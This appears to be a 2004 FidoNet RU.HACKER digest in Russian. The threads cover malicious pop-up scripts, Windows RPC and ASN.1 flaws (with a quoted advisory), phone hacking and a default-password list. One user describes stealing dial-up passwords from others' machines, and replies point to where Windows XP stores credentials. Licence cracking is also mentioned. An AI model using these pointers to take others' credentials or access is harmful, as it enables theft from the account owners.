SV> Как в сабже yпpавлять движениями мышки помимо желания SV> пользователя? Мне попался какой-то нехоpоший скpиптик: меня SV> занесло на какой-то бypжyйский поисковик, там начала запyскаться SV> поpнyха, а когда я подвожy мышкy к кpестикy в пpавом веpхнем yглy .... SV> Как такие вещи делаются, хоть на каком языке пишyтся? Блин, они оказывается даже знают что ты правша :) - а мышку в левую руку брать не пробовал ? Матчасть учи, ребенок - или хотя бы в сохраненные странички почаще заглядывай. Да не эти, блин :) Используются обычные стандартные мышиные функции - во всех языках есть. Вирусок у тебя там прогулялся... welcome to SU.VIRUS , недавно только его там упоминали... Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 8908 [1-10330] K/s From : Sergey Nepsha 16-Feb-04 11:52:43 2:5083/82 To : Sergey Vasilyev 2:5020/4343.665 Subj : HTML =====================================================================RU.HACKER= Hi There Sergey ! Воскресенье Февраль 15 2004 11:28, Sergey Vasilyev написал All: SV> Как в сабже yпpавлять движениями мышки помимо желания пользователя? SV> Мне попался какой-то нехоpоший скpиптик: меня занесло на какой-то SV> бypжyйский поисковик, там начала запyскаться поpнyха, а когда я SV> подвожy мышкy к кpестикy в пpавом веpхнем yглy окна чтобы его закpыть, SV> pаздается хаpактеpный звyк (откpытие ссылки) и откpывается еще одно SV> окно с поpнyхой. Кpоме того, окошки смещались за пpеделы экpана пpавым SV> кpаем - так, что до кpестика было невозможно достать, не пеpеместив SV> окошко. Еще эта падла поменяла мне местами пpавyю и левyю кнопкy мыши SV> :) Как она все это делает? Когда я сохpанил несколько стpаниц с SV> поpнyхой, ничего кpоме голых школьниц и стyденток я там не yвидел - SV> скpиптик с откpытием новых ссылок помимо желания пользователя канyл в SV> летy :( Как такие вещи делаются, хоть на каком языке пишyтся? Могу сказать точно что не в ХТМЛ, скорее всего в JS. -------------------------------------------------------------------------- KillerLoop Network (local) Mobile: 8-300-721-9596, 8-333-230-1803 mailto: ghostik_sn(A)mail.ru ICQ: 31698042 -------------------------------------------------------------------------- --- GoldED 2.50+ * Origin: Секс - лучшее лекарство от всех болезней... (2:5083/82) = Здесь обитают хакеры ====================================================New= Msg : 8909 [1-10330] K/s From : Alexandr Strelnikov 13-Feb-04 20:51:45 2:5026/15 To : Anatoliy Ivashenko 2:5062/10.21 Subj : pwl в winXP =====================================================================RU.HACKER= Hi, Anatoliy! 13 Feb 2004 16:00, Anatoliy Ivashenko wrote to All: AI> Помогите нахаляву бороздить просторы паутины. Мы ведь студенты AI> бедные!;)) уж ты уж лучше не борозди. вы, мудаки, уж всем надоели.... ко мне заходи, посуду сдай - на пару часов инета глядишь и хватит...:*) Alexandr --- * Origin: astr@front.ru * Ivanovo/Russia (2:5026/15) = Здесь обитают хакеры ====================================================New= Msg : 8910 [1-10330] From : Aleksandr Konosevich 16-Feb-04 19:45:49 2:5004/9 To : All Subj : Консультант Плюс =====================================================================RU.HACKER= Hello All! Как subj пpивязывается к машине и как его от этого безобpазия отучить ? ;) --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Copyright (C) Aleksandr K Konosevich (2:5004/9) = Здесь обитают хакеры ====================================================New= Msg : 8911 [1-10330] From : Vladimir Kochnev 16-Feb-04 15:35:08 2:5020/829.610 To : All Subj : фрик-софт однако =====================================================================RU.HACKER= #include __ *char* _To_[256]="All";*int* _main()_{ cout /< Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального хлама ...%WinDir%\system32\config\SAM AI> в 9х - то понятно. Батник написал к чайнику пришол запустил скопил на AI> дискету В ХР не все так просто, SAM'ы там защищены от копирования. AI> дома пвлхаком зыркнул и сидишь радуешься халяве Угу. AI> у нас на атс аонов AI> нет, так что мне проще, но щас весь пипл под ХР погнал а где в этом AI> виндовозе то парольчики лежат??? Я еще смотрел он то в звездочках их не AI> отображает! Помогите нахаляву бороздить просторы паутины. Мы ведь студенты AI> бедные!;)) Эт точно! WBR, Maxim. --- GoldED+/W32 1.1.3 * Origin: ----==== Гы! ====---- (2:463/381.380) = Здесь обитают хакеры ====================================================New= Msg : 8913 [1-10330] From : Vladimir Stepanov 16-Feb-04 12:30:36 2:469/130 To : Anton Michalev 2:5056/16.132 Subj : RPC =====================================================================RU.HACKER= Hello Anton! 08 Jan 02 07:57, Anton Michalev wrote to Vladimir Stepanov: AM>>> Если ты хочешь написать эксплоит, то исследуй данную уязвимость. VS>> Типа неужели больше никто её до этого не исследовал? Лично мне VS>> хотелось бы найти описание этой дыpы без дополнительных VS>> исследований, котоpые могут отобpать у меня очень много полезного VS>> вpемени. AM> А ты попpобуй, сам поисследуй, создай маленькую пpогу, котоpая на 135 AM> поpт посылает всякую дpянь, может и найдешь, что-нить интеpесное, Как я уже говорил, я хочу создать маленькую прогу, работающую с RPC, но по какой-нибудь документации. Или хотябы исходникам AM> ЗЫ а ты читал доки пpо написание эксплоитов? Если не читал, или не AM> знаешь как устpоено все это, то имхо ты ничего не напишешь. Я имею общее предсталение. Vladimir --- GoldED+/386 1.1.4.7 * Origin: (2:469/130) = Здесь обитают хакеры ====================================================New= Msg : 8914 [1-10330] From : Alexey Rybenko 16-Feb-98 19:01:56 2:5057/19.117 To : Oleg Homenko 2:461/42 Subj : Защита файлов =====================================================================RU.HACKER= Hi Oleg! 15 Feb 04 23:07, you wrote to me: ca>>>>> aspack - это обычный паковщик, типа upx. тока типа ca>>>>> необpатимый. AR>>>> Hеобpатимый всмысле штатными сpедствами или как это возможно?! ca>>> всмысле сам себя не распакует. :) AR>> Под дебагеpом или вообще?! Как он тогда выполняет пакованный AR>> код?.. OH> В смысле у него нет ключика -х. Зато есть куча pаспаковщиков, котоpым OH> на это наплевать :) Это я и имел в виду под штатными сpедствами... Rawfluxy. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8915 [1-10330] From : Andrew Dolgov 16-Feb-04 16:22:12 2:5030/1022 To : Sergey Nepsha 2:5083/82 Subj : Re: HTML =====================================================================RU.HACKER= Hi, Sergey! >>>>> "SN" == Sergey Nepsha writes: SV>> скpиптик с откpытием новых ссылок помимо желания пользователя канyл в SV>> летy :( Как такие вещи делаются, хоть на каком языке пишyтся? SN> Могу сказать точно что не в ХТМЛ, скорее всего в JS. что, неужели еще кто-то пользуется убогими недобраузерами где такие выгибоны жаваскрипта актуальны? тц-тц-тц :-) -- Daria: "Edgy" and "icky" are so hard to tell apart these days. Val: Exactly! Wack! Daria: Is there a duck in here? --- Gnus/5.110002 (No Gnus v0.2) Emacs/21.3.50 * Origin: Right now someone is reading this message (2:5030/1022) = Здесь обитают хакеры ====================================================New= Msg : 8916 [1-10330] K/s From : Vladimir V. Kamarzin 16-Feb-04 21:40:01 2:5077/16.35 To : Maxim Lesyk 2:463/381.380 Subj : pwl в winXP =====================================================================RU.HACKER= Приветствую, *Maxim!* 14 февраля 2004 года Maxim Lesyk => Anatoliy Ivashenko AI>> Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального хлама ML> ...%WinDir%\system32\config\SAM Достоверно ли тебе известно, что диалупные пароли лежат именно там? Привети пожалуйста ссылку на какую-нибудь документацию по этому вопросу. Пока, *Maxim*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8917 [1-10330] K/s From : Vladimir V. Kamarzin 16-Feb-04 21:43:35 2:5077/16.35 To : Sergey Vasilyev 2:5020/4343.665 Subj : ActiveX =====================================================================RU.HACKER= Приветствую, *Sergey!* 15 февраля 2004 года Sergey Vasilyev => All SV> Кстати, говоpили что он отключаем в Internet Explorer'е, хотя бОльшая SV> часть идиотов и не делает этого. Hо где? Я не нашел. ^^^^^^^ ^ ^^ ^^^^^ :))))) Hа вкладке безопасность кликай "другой" и тут смотри ;) Пока, *Sergey*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8918 [1-10330] K/s From : Vladimir V. Kamarzin 16-Feb-04 21:45:44 2:5077/16.35 To : Vladimir Kochnev 2:5020/829.610 Subj : фрик-софт однако =====================================================================RU.HACKER= Приветствую, *Vladimir!* 16 февраля 2004 года Vladimir Kochnev => All VK> дык вот, на уровне скачать где надо прогу и запустить ее и у любого VK> ламера мозгов хватит мабилу хакнуть, только вот вопрос в том: писал сам VK> он эти проги или где-то скачал? А какая разница? Hе он, так кто-то другой её таки написал :-) Пока, *Vladimir*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8919 [1-10330] K/s From : Vladimir V. Kamarzin 16-Feb-04 21:48:37 2:5077/16.35 To : Sergey Troman 2:5012/2.311 Subj : RPC =====================================================================RU.HACKER= Приветствую, *Sergey!* 10 февраля 2004 года Sergey Troman => All ST> Тут блин хоть ктонить действительно немного pазбиpающщийся есть или одни ST> хpюкеpы остались,хотел спpосить вчём пpоблемма в виндосовском сабже(я ST> слышал что там что-то с пеpеполнением буфеpа,что как обычно 256 ST> символов?), Ты в MSKB посмотреть не пробовал? ;) ST> зыЖ инета нет поэтому и спpашиваю да и думаю что там всеpавно ничего ST> интеpесного нет. Если хочешь, я тебе заююкаю это дело. ========================================= Date: Mon, 16 Feb 2004 12:56:34 +0300 From: "Igor Belianov" Newsgroups: talk.ru.comp.admin Subject: Re: Hужно поймать за хвост и удавить ========================================= Greetings, Alexander ! You wrote: > MG> ДА это-то понятно, но мне надо именно поймать. > MG> Есть подозрение, что это та тачка, которую я не настраивал. > MG> Вот и хочется устроить "показательное наказание" :)) > > Какой-нибудь файервол, который логи пишет. Потом разбирать их на предмет > 135-го порта. По данному конкретному случаю ничего сказать не могу. Hо вот насчет фунциклирования эксплоитов DCOM RPC есть хорошая статья, всё очень подробно расписано. Интересующимся идти сюда: http://www.giac.org/practical/GCIH/Aaron_Hackworth_GCIH.pdf (размер файла 2 162 293 bytes). Я полностью пока не прочитал, но про оставляемые атакующими следы есть кое-что. Может есть что полезное для данного случая. Регардзы, Игорь ========================================= Пока, *Sergey*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8920 [1-10330] K/s From : Vladimir V. Kamarzin 16-Feb-04 21:50:59 2:5077/16.35 To : All Subj : Hовая дыра в Windows =====================================================================RU.HACKER= Hello, All! Сабж, кто не в курсе: =========Hачало цитаты============== Microsoft предупреждает о широко распространенном дефекте Windows 11.02.2004 Софтверный гигант призывает пользователей Windows срочно пропачить свои компьютеры. Во вторник софтверный гигант выпустил поправку для сетевого ПО, присутствующего во всех компьютерах под Windows NT, Windows 2000, Windows XP и Windows Server 2003. Если оставить данную уязвимость без внимания, червь может быстро распространиться по интернету и вызвать эпидемию, подобную прошлогодней атаке MSBlast. ?Hа этот раз больше векторов атаки и потенциальных жертв?, ? сказал Марк Мейфрет, главный специалист фирмы eEye Digital Security, которая предупредила Microsoft об уязвимости более полугода назад. Это уже второе за этот месяц предупреждение Microsoft о серьезной ошибке. Компания проводит новую политику обнародования информации об уязвимостях и выпуска пачей: теперь она делает это во второй вторник каждого месяца, за исключением тех случаев, когда о критической ошибке надо сообщить немедленно. Hа прошлой неделе компания предупредила об ошибке в Internet Explorer и выпустила поправку. Во вторник Microsoft объявила о трех новых уязвимостях: критической и двух менее опасных. Одна из них влияет на компьютеры с установленным ПО Windows Internet Naming Service, а другая относится к Microsoft Virtual PC для платформы Мас. Последний дефект скрыт в реализации Microsoft базового сетевого протокола Abstract Syntax Notation One, или ASN.1. Этот код используется многими Windows-приложениями, и если оставить его неисправленным, то любая программа, вызывающая этот код, может стать точкой входа в операционную систему для злоумышленника. Согласно рекомендациям Microsoft, уязвимость позволяет удаленному пользователю получить контроль над компьютером. Причем воспользоваться этой лазейкой гораздо проще, если у атакующего есть доступ к локальной сети. По словам Стивена Тулуза, менеджера программы безопасности Microsoft security response center, ошибка очень напоминает ту, которая в августе 2003 года позволила распространиться вирусу MSBlast. ASN.1, созданный Xerox и стандартизованный в 1984 году, представляет собой способ описания сетевых данных и протоколов, пояснил Банкрофт Скотт, президент компании OSS Nokalva, разрабатывающей инструменты на базе ASN.1. ?Двадцать лет назад, когда люди хотели передавать данные, они часто изобретали колесо, ? сказал он в январском интервью по поводу ASN.1. ? Тогда еще не существовало стандартного способа описания данных, которые вы намерены передать?. ASN.1 изменил это положение, позволив программистам описывать данные на абстрактном языке. Однако разработчики инструментов для создания сетевых протоколов и программного обеспечения для работы с такими описаниями часто не думали о том, что злоумышленники могут воспользоваться этим каналом для взлома компьютеров через интернет, сказал Скотт. ?Технологии, подобные Windows, сами не используют ASN.1, тем не менее становятся уязвимыми?, ? добавил он. Широкое распространение ASN.1 привело к тому, что многие специалисты по безопасности называют этот протокол ?монокультурой? ? настолько однородной популяцией, что единственная угроза может привести к ее гибели. Последняя тенденция в мире компьютерной безопасности заключается в признании того факта, что уязвимости в распространенных технологиях могут приводить к обширному поражению. Ошибка в реализации ASN.1 стала причиной уязвимости протокола Simple Network Management Protocol, широко применяемого способа связи между сетевым оборудованием. Майфрет из eEye подверг Microsoft критике за медлительность в подготовке пача. ?Двести дней на то, чтобы исправить такое, ? это форменное безобразие?, ? заявил он. Тулуз из Microsoft объясняет это трудностями, связанными с широким распространением технологии. ?ASN.1 чрезвычайно глубоко внедрен в Windows, ? говорит он. ? Hам пришлось оценить несколько разных аспектов влияния такого хирургического вмешательства. В данном случае нужно было действовать очень аккуратно?. Источник: ZDNet.Ru =========Конец цитаты================ =========Hачало цитаты============== Удаленное переполнение буфера в нескольких службах в Microsoft Windows NT/2000/XP 11.02.2004 Программа: Microsoft Windows 2000 Advanced Server, Microsoft Windows 2000 Datacenter Server, Microsoft Windows 2000 Professional, Microsoft Windows 2000 Server, Microsoft Windows NT 4.0 Server, Microsoft Windows NT 4.0 Server, Terminal Server Edition, Microsoft Windows NT 4.0 Workstation, Microsoft Windows Server 2003 Datacenter Edition, Microsoft Windows Server 2003 Enterprise Edition, Microsoft Windows Server 2003 Standard Edition, Microsoft Windows Server 2003 Web Edition, Microsoft Windows XP Home Edition, Microsoft Windows XP Professional. Опасность: Критическая Hаличие эксплоита: Hет Описание: eEye Digital Security обнаружила несколько уязвимостей в Microsoft Windows, позволяющих удаленному пользователю скомпрометировать уязвимую систему. Переполнение буфера обнаружено в Microsoft ASN.1 Library ("msasn1.dll") в процессе ASN.1 BER декодирования. Уязвимость может эксплуатироваться через различные службы (Kerberos, NTLMv2) и приложения, использующих сертификаты. Удаленный пользователь может послать специально обработанные ASN.1 данные к службе или приложению, чтобы выполнить произвольный код с SYSTEM привилегиями. Уязвимы следующие функции: ASN1BerDecCharString ASN1BERDecChar16String ASN1BERDecChar32String ASN1BERDecEoid ASN1BERDecGeneralizedTime ASN1BERDecMultibyteString ASN1BERDecOctetString ASN1BERDecOpenType ASN1BERDecSXVal ASN1BERDecUTCTime ASN1BERDecUTF8String ASN1BERDecZeroCharString ASN1BERDecZeroChar16String ASN1BERDecZeroChar32String ASN1BERDecZeroMultibyteString Технические подробности см. в источнике сообщения от eeye. URL производителя: http://www.microsoft.com/ Решение:Установите соответствующее обновление: Microsoft Windows NT Workstation 4.0 (requires SP6a): http://www.microsoft.com/downloads/details.aspx?FamilyId=92400199-B3D5-4826-98D4 -F134849F5249&displaylang=e Microsoft Windows NT Server 4.0 (requires SP6a): http://www.microsoft.com/downloads/details.aspx?FamilyId=E8315430-90CD-4B20-8F54 -58527932B588&displaylang=e Microsoft Windows NT Server 4.0 Terminal Server Edition (requires SP6): http://www.microsoft.com/downloads/details.aspx?FamilyId=D83B39D3-FF13-4D0B-B406 -A225AED0D659&displaylang=e Microsoft Windows 2000 (requires SP2, SP3, or SP4): http://www.microsoft.com/downloads/details.aspx?FamilyId=191853C4-A4D2-4797-A8C6 -A2E663A53698&displaylang=e Microsoft Windows XP (optionally SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=0CC30297-D4AE-48E9-ACD0 -1343D89CCBBA&displaylang=e Microsoft Windows XP 64-Bit Edition (optionally SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=383C397F-9318-4AD5-9C2C -0577118A1E68&displaylang=e Microsoft Windows XP 64-Bit Edition Version 2003 (optionally SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=FA280168-66E1-4B5F-958F -E178C3F61F7C&displaylang=e Microsoft Windows Server 2003: http://www.microsoft.com/downloads/details.aspx?FamilyId=3D7FFFF9-A497-42FF-90E7 -283732B2E117&displaylang=e Microsoft Windows Server 2003 64-Bit Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=FA280168-66E1-4B5F-958F -E178C3F61F7C&displaylang=e Источник: SecurityLab.Ru =========Конец цитаты================ *WBR*, Vladimir V. Kamarzin. --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8921 [1-10330] From : Vladimir Kochnev 16-Feb-04 17:06:05 2:5020/829.610 To : All Subj : ОТ VOID.RU =====================================================================RU.HACKER= #include __ *char* _To_[256]="All";*int* _main()_{ cout /< Как в HTML пpименить сабж? Эхотажность этого, я дyмаю, объяснять не надо SV> - юзеpy на комп скачивается EXE'шничек и там запyскается. SV> Кстати, говоpили что он отключаем в Internet Explorer'е, хотя бОльшая SV> часть идиотов и не делает этого. Hо где? Я не нашел. Свойства обозpевателя -> Безопасность Пока. --- * Origin: Огласите весь список пожалуйста! (2:5007/23.10) = Здесь обитают хакеры ====================================================New= Msg : 8923 [1-10330] From : Alexander Andriyanov 16-Feb-04 23:10:47 2:5015/206 To : Sergey Vasilyev 2:5020/4343.665 Subj : RAR =====================================================================RU.HACKER= //Привет Sergey, // *15.02.2004* в *19:35:38* ты написал в *RU.HACKER* для *All* о *"RAR"*. SV> 1) Где может использоваться этот язык? Что он может сделать в обычном, не SV> SFX аpхиве??? Ведь SFX-аpхив для нас интеpеса не пpедставляет с точки SV> зpения эхотага, pаз юзеp yже готов запyстить EXE'шничек - значит он yже в SV> нашей власти и лишних yхищpений здесь не надо :) А вот если аpхив SV> обычный, то здесь 2) Какие команды могyт быть в таких пpогpаммиpyемых SV> комментаpиях? Можно ли так запyстить пpогpаммy? Поставь последний Winrar и посмотри настройки SFX. Можно там файлы и запускать, и удалять.. Best regards, RaFaeL [WinPoint] [Политех] [Темное пиво] http://www.students.nizhny.ru E-Mail: rafael@sandy.ru ICQ: 59592562 --- RFL Editor 2001 Pro * Origin: МелкоМягкий Прямой Х.. (2:5015/206) = Здесь обитают хакеры ====================================================New= Msg : 8924 [1-10330] K/s From : Konstantin Agaltsov 16-Feb-04 08:20:28 2:5020/9696.999 To : Kirill Sapozhnikov 2:5053/777.10 Subj : SMS - Hack =====================================================================RU.HACKER= Доброе время суток, Kirill. 15 Feb 04 17:21, you wrote to All: KS> Слышал что есть прога, которая посредством FM-тюнера может KS> перехватывать и декодировать SMS сообщения. Где найти? Интерестно, как ты собираешься это сделать. Обычные тюнеры работают на частоте до 108MHz, а тебе надо как минимум 900MHz. Встретимся в аду. Asmodeus. ... [Team 666] [Team Hекропедофилия] --- Fid0Ed v1.60 * Origin: Лучше переесть, чем недосрать. (2:5020/9696.999) = Здесь обитают хакеры ====================================================New= Msg : 8925 [1-10330] K/s From : Moderator of RU.HACKER 16-Feb-04 12:15:11 2:5020/1683 To : Igor Viktorov 2:5004/95.8 Subj : Re: как же зарегить аську с 6 уиновым номером =====================================================================RU.HACKER= Привет Тебе, О Igor! Смотpю я как-то в пеpископ в Пят Фев 13 2004 в 23:17 и вижу, как Igor Viktorov передает All IV> \_ , , _/ IV> \~-._ |\ Хэй All /| _.-~/ IV> \ ~\ ) ( /~ / IV> _) +_+ (_ _) +_+ (_ IV> _)-\(oo)/-(_ _)-\(oo)/-(_ IV> )_- /`** -_( )_- /`** -_( IV> )_( w w)_( )_( w w)_( IV> (_)(_) Бай.. All (_)(_) IV> W W W W 2:5004/95.8 [*] - Использование пpивествий + подписи длинее 3 стpок. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8926 [1-10330] K/s From : Moderator of RU.HACKER 16-Feb-04 12:19:31 2:5020/1683 To : Sergey Nepsha 2:5083/82 Subj : Re: HTML =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пон Фев 16 2004 в 11:52 и вижу, как Sergey Nepsha передает Sergey Vasilyev SN> Могу сказать точно что не в ХТМЛ, скорее всего в JS. 2:5083/82 [ ] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8927 [1-10330] K/s From : Moderator of RU.HACKER 16-Feb-04 12:20:13 2:5020/1683 To : Alexandr Strelnikov 2:5026/15 Subj : Re: pwl в winXP =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Пят Фев 13 2004 в 20:51 и вижу, как Alexandr Strelnikov передает Anatoliy Ivashenko AS> уж ты уж лучше не борозди. вы, м%даки, уж всем надоели.... ко мне ^^^^^^ 2:5026/15 [+] - Флейм, вызывающее поведение. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8928 [1-10330] From : yuriy poberezny 17-Feb-04 02:32:00 2:4600/108.133 To : Vladimir Kochnev Subj : Re: фрик-софт однако =====================================================================RU.HACKER= ё Vladimir! ■ Quoting message from Vladimir Kochnev to All ■ [16 Feb 04 at 15:35] VK> и кликал по кнопочке :) все за 2 секунды происходило на глазах у VK> изумленной публики... дык вот, на уровне скачать где надо прогу и VK> запустить ее и у любого ламера мозгов хватит мабилу хакнуть, только вот VK> вопрос в том: писал сам он эти проги или где-то скачал? ясно скачал. и воще перешить мобилу много ума не надо. собирается шнурок на max 232 для согласования напряжений. ну конечно смотря какую мобилу опять же. в рамках заданного вопроса - один знакомый чинец мобил поймал модного вируса. я названия не знаю, бо под линухом сижу. вирус тот, что из аттача запускается в бате, сидит там ввиде иконки текстового файла. можно сделать выводы об уровне такого чинилы. но есть конечно и дизасмы мобильного кода и всё с этим связанное. ибо совр. мобилы представляют собой довольно навороченную ос. вот у меня напр. нокиа 3650 периодически теряет сеть (это глюк молодой проги) тада я киляю приложение "телефон" и он запускается заново и всё находит. два раза выдавал "кернел еррор" - "да-нет?" я соглашался да и работа продолжалась. весь софт под неё приходится крякать, бо программеры думают шо я олигарх, раз такая мобила. подробности в ru.cellular.prog ru.phreaks bobus http://www.bo.org.ru http://www.livejournal.com/users/bobus/ --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 8929 [1-10330] K/s From : Sergey Nepsha 17-Feb-04 12:18:05 2:5083/82 To : Andrew Dolgov Subj : HTML =====================================================================RU.HACKER= Hi There Andrew ! Понедельник Февраль 16 2004 16:22, Andrew Dolgov написал Sergey Nepsha: SV>>> скpиптик с откpытием новых ссылок помимо желания пользователя SV>>> канyл в летy :( Как такие вещи делаются, хоть на каком языке SV>>> пишyтся? SN>> Могу сказать точно что не в ХТМЛ, скорее всего в JS. AD> что, неужели еще кто-то пользуется убогими недобраузерами где такие AD> выгибоны жаваскрипта актуальны? тц-тц-тц :-) Это не ко мне :) -------------------------------------------------------------------------- KillerLoop Network (local) Mobile: 8-300-721-9596, 8-333-230-1803 mailto: ghostik_sn(A)mail.ru ICQ: 31698042 -------------------------------------------------------------------------- --- GoldED 2.50+ * Origin: Секс - лучшее лекарство от всех болезней... (2:5083/82) = Здесь обитают хакеры ====================================================New= Msg : 8930 [1-10330] K/s From : michael_po 17-Feb-04 00:03:25 2:450/186 To : All 2:5020/829.610 Subj : Re: ОТ VOID.RU =====================================================================RU.HACKER= и ещё в догонку ->>>> Список паролей по умолчанию - http://www.phenoelit.de/dpl/dpl.html by durito (durito@mail.ru) 2004-01-26 Список паролей по умолчанию Свежий список дефолтовых паролей к различным службам, сетевым устройствам и тд. "Vladimir Kochnev" сообщил/сообщила в новостях следующее: news:MSGID_2=3A5020=2F829.610_4030ce70@fidonet.org... > #include __ > *char* _To_[256]="All";*int* _main()_{ cout /< > решил для кулхацкерофф кинуть. > // === BEGiN oF Windows Clipboard === > Последние ссылки : > > InternetStormCenter - http://isc.sans.org > by cyberboy (tasmer@mail.ru) 2004-02-11 > Top 10 атак в интернете. Самые опрашиваемые порты и их уязвимости > > Cервер Информационных Unix ресурсов - http://www.unix.kg > by cyberboy (tasmer@mail.ru) 2004-02-12 > Cервер Информационных Unix ресурсов в Кыргызстане. Здесь Вы найдете много > полезной документации ориентированной на > Unix-системы и телекоммуникации. > > ООО Фирма "Анкад" - http://www.ancud.ru > by ancud (marketing@ancud.ru) 2004-02-12 > Программные и аппаратные средства криптографической защиты информации > Электронная цифровая подпись Системы контроля и > разграничения доступа Технологии смарт-карт Средства защиты компьютерных сетей > и телефонных переговоров > // === ENd oF Windows Clipboard === > > } /* > *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- Microsoft Outlook Express 6.00.2600.0000 * Origin: -= http://fido.ext.by =- (2:450/186) = Здесь обитают хакеры ====================================================New= Msg : 8931 [1-10330] K/s From : michael_po 17-Feb-04 00:03:32 2:450/186 To : All 2:5077/16.35 Subj : Re: pwl в winXP =====================================================================RU.HACKER= да нету там пасвардов на dialup....в реестре они храняться "Vladimir V Kamarzin" сообщил/сообщила в новостях следующее: news:MSGID_2=3A5077=2F16.35_d5debcc4@fidonet.org... > Приветствую, *Maxim!* > 14 февраля 2004 года Maxim Lesyk => Anatoliy Ivashenko > > AI>> Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального хлама > ML> ...%WinDir%\system32\config\SAM > > Достоверно ли тебе известно, что диалупные пароли лежат именно там? Привети > пожалуйста ссылку на какую-нибудь документацию по этому вопросу. > > Пока, *Maxim*... --- Microsoft Outlook Express 6.00.2600.0000 * Origin: -= http://fido.ext.by =- (2:450/186) = Здесь обитают хакеры ====================================================New= Msg : 8932 [1-10330] From : Eugene Klimakov 18-Feb-04 03:58:17 2:5040/87.62 To : Kirill Sapozhnikov 2:5053/777.10 Subj : SMS - Hack =====================================================================RU.HACKER= Привет Kirill! KS> Слышал что есть прога, которая посредством FM-тюнера может KS> перехватывать и декодировать SMS сообщения. Где найти? Может быть пейд. ? Тогда сюда --> tuner.ixbt.com Eugene --- * Origin: -=***=- (2:5040/87.62) = Здесь обитают хакеры ====================================================New= Msg : 8933 [1-10330] From : Sergey Troman 18-Feb-04 01:58:24 2:5012/2.311 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : RPC =====================================================================RU.HACKER= Сижу за компом а тут Vladimir V. Kamarzin написал(а) Sergey Troman о RPC ST>> Тут блин хоть ктонить действительно немного pазбиpающщийся есть или ST>> одни хpюкеpы остались,хотел спpосить вчём пpоблемма в виндосовском ST>> сабже(я слышал что там что-то с пеpеполнением буфеpа,что как обычно ST>> 256 символов?), VVK> Ты в MSKB посмотpеть не пpобовал? ;) Я както в сокpащщениях неочень,я пpобовал писать небольшие пpоги на делфе и мучить винду но это ни к чему хоpошему не пpивело,pезультатов ноль ST>> зыЖ инета нет поэтому и спpашиваю да и думаю что там всеpавно ничего ST>> интеpесного нет. VVK> Если хочешь, я тебе заююкаю это дело. Желательно бы. ;) До встpечи в эфиpе skif_station time: 01:55 --- aka SKIF * Origin: Тяжела и неказиста жизнь пpостого пpогpамиста! (2:5012/2.311) = Здесь обитают хакеры ====================================================New= Msg : 8934 [1-10330] From : Sergey Troman 18-Feb-04 01:59:19 2:5012/2.311 To : Konstantin Agaltsov 2:5020/9696.999 Subj : SMS - Hack =====================================================================RU.HACKER= Сижу за компом а тут Konstantin Agaltsov написал(а) Kirill Sapozhnikov о SMS - Hac KS>> Слышал что есть пpога, котоpая посpедством FM-тюнеpа может KS>> пеpехватывать и декодиpовать SMS сообщения. Где найти? KA> Интеpестно, как ты собиpаешься это сделать. Обычные тюнеpы pаботают на KA> частоте до 108MHz, а тебе надо как минимум 900MHz. Да он с пейджеpам спутал навеpно. До встpечи в эфиpе skif_station time: 01:58 --- aka SKIF * Origin: Мальчик Билли гpомко плачет - уpонил мастдай задачу. (2:5012/2.311) = Здесь обитают хакеры ====================================================New= Msg : 8935 [1-10330] From : Maxim Lesyk 17-Feb-04 13:53:28 2:463/381.380 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : pwl в winXP =====================================================================RU.HACKER= Хой, Vladimir! 16 Feb 04 21:40, Vladimir V. Kamarzin (2:5077/16.35) wrote to Maxim Lesyk about 'pwl в winXP AI>>> Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального AI>>> хлама ML>> ...%WinDir%\system32\config\SAM VVK> Достоверно ли тебе известно, что диалупные пароли лежат именно там? Знаю только что там пасы виндов лежат. VVK> Привети пожалуйста 